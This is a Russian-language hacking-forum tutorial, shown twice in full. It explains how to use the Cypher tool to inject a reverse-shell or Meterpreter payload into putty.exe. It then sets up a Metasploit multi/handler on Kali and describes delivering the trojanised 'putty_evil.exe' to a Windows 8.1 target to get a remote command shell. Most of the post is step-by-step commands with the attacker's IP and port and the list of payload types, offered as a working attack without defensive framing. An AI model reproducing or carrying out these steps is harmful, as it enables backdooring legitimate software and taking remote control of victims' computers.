Vander
11.12.2016, 00:03
Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.
https://forum.antichat.xyz/attachments/4767656/img_f5e283a84a.png
В качестве атакующей системы будет использоваться OS Kali Linux,
https://forum.antichat.xyz/attachments/4767656/img_4bb59e83ba.png
в качестве целевой системы Windows 8.1 с актуальными обновлениями.
https://forum.antichat.xyz/attachments/4767656/img_259c604b34.png
Итак, вернемся к Cypher, скачиваем ее с Github:
> git clonehttps://github.com/xan7r/cypher
https://forum.antichat.xyz/attachments/4767656/img_730b18fc5c.png
Выполняем следующие команды:
> cd cypher
> chmod a+x addShell.py
> ls –a
Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.
https://forum.antichat.xyz/attachments/4767656/img_26ed16956a.png
Теперь выполним следующую команду:
> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0
https://forum.antichat.xyz/attachments/4767656/img_0bbb0cea72.png
В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.
· 0 – windows/shell_reverse_tcp
· 1 – windows/meterpreter/reverse_http
· 2 – windows/meterpreter/reverse_http +PrependMigrate
· 3 – windows/meterpreter/reverse_https
· 4 – windows/meterpreter/reverse_https +PrependMigrate
По итогу получаем файл putty_evil.exe в папке с Cypher.
https://forum.antichat.xyz/attachments/4767656/img_656d7ecdb8.png
Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
https://forum.antichat.xyz/attachments/4767656/img_a5cfe7cd34.png
Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.
https://forum.antichat.xyz/attachments/4767656/img_69079b5af0.png
Сменим кодировку командой:
> chcp 65001
https://forum.antichat.xyz/attachments/4767656/img_e5db342e2d.png
Посмотрим подробную информацию о системе:
> systeminfo
https://forum.antichat.xyz/attachments/4767656/img_0ae7a5b4db.png
Это все. Спасибо за внимание.
https://forum.antichat.xyz/attachments/4767656/img_f5e283a84a.png
В качестве атакующей системы будет использоваться OS Kali Linux,
https://forum.antichat.xyz/attachments/4767656/img_4bb59e83ba.png
в качестве целевой системы Windows 8.1 с актуальными обновлениями.
https://forum.antichat.xyz/attachments/4767656/img_259c604b34.png
Итак, вернемся к Cypher, скачиваем ее с Github:
> git clonehttps://github.com/xan7r/cypher
https://forum.antichat.xyz/attachments/4767656/img_730b18fc5c.png
Выполняем следующие команды:
> cd cypher
> chmod a+x addShell.py
> ls –a
Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.
https://forum.antichat.xyz/attachments/4767656/img_26ed16956a.png
Теперь выполним следующую команду:
> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0
https://forum.antichat.xyz/attachments/4767656/img_0bbb0cea72.png
В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.
· 0 – windows/shell_reverse_tcp
· 1 – windows/meterpreter/reverse_http
· 2 – windows/meterpreter/reverse_http +PrependMigrate
· 3 – windows/meterpreter/reverse_https
· 4 – windows/meterpreter/reverse_https +PrependMigrate
По итогу получаем файл putty_evil.exe в папке с Cypher.
https://forum.antichat.xyz/attachments/4767656/img_656d7ecdb8.png
Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
https://forum.antichat.xyz/attachments/4767656/img_a5cfe7cd34.png
Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.
https://forum.antichat.xyz/attachments/4767656/img_69079b5af0.png
Сменим кодировку командой:
> chcp 65001
https://forum.antichat.xyz/attachments/4767656/img_e5db342e2d.png
Посмотрим подробную информацию о системе:
> systeminfo
https://forum.antichat.xyz/attachments/4767656/img_0ae7a5b4db.png
Это все. Спасибо за внимание.